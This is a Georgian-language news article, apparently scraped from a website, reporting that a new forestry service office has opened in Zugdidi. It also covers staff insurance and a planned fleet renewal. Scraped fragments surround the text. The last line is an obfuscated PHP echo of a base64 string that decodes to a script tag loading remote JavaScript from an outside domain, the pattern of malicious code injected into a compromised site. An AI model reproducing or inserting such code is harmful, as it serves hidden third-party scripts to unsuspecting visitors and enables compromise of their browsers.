celsiusi
ავერსი საქკაბელი

ზუგდიდში სატყეო სამსახურის ახალი ოფისი გარემოს დაცვისა და სოფლის მეურნეობის მინისტრმა, ოთარ შამუგიამ და სამეგრელო ზემო-სვანეთში სახელმწიფო რწმუნებულმა, გიორგი გუგუჩიამ გახსნეს. სატყეო სამსახური რეგიონის ცხრა მუნიციპალიტეტს მოემსახურება.

გარემოს დაცვის სამინისტროს ცნობით, მოქალაქეები განახლებულ სივრცეში ეროვნული სატყეო სააგენტოს ყველა სერვისით ისარგებლებენ. შენობა აღჭურვილია საჭირო ინვენტარითა და ტექნიკით.

„ჩვენთვის მნიშვნელოვანია, ადგილობრივმა მოსახლეობამ მარტივად შეძლოს ეროვნული სატყეო სააგენტოს სერვისებით სარგებლობა. აქვე მინდა, აღვნიშნო, რომ სააგენტოს მთავარ პრიორიტეტად რჩება თანამშრომელთა სოციალური გარანტიები და სამუშაო პირობები. გასულ წლებში განხორციელებული საკანონმდებლო ცვლილებებით, სატყეო სააგენტო უზრუნველყოფს მეტყევეების სიცოცხლისა და ჯანმრთელობის დაზღვევას, განსაკუთრებული სირთულის დავალების შესრულებისათვის წახალისების ფორმის გამოყენებას, რაც, ვფიქრობთ, მნიშვნელოვნად გაზრდის დასაქმებულთა მოტივაციას“, – განაცხადა გარემოს დაცვისა და სოფლის მეურნეობის მინისტრის მოადგილემ, კახა კაკაბაძემ.

ღონისძიებას ადგილობრივი თვითმმართველობის წარმომადგენლები ესწრებოდნენ. გარემოს დაცვის სამინისტროს ცნობით, რეგიონული სატყეო სამსახურების ოფისების რეაბილიტაცია თითქმის ყველა რეგიონში დასრულებულია. ამ დროისთვის განახლებულია ავტოპარკის ნაწილი და აღჭურვილობა.

„აღსანიშნავია, რომ სექტემბრის თვის ბოლომდე ეროვნული სატყეო სააგენტო სრულად განაახლებს ავტოპარკს. 30 ერთეული მაღალი გამავლობისა და სპეციალური დანიშნულების ტექნიკა ცხრა რეგიონულ სატყეო სამსახურში გადანაწილდება, რაც უზრუნველყოფს სატყეო-სამეურნეო ღონისძიებების ეფექტიანად განხორციელებას“, – აცხადებენ გარემოს დაცვის სამინისტროში.

586
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");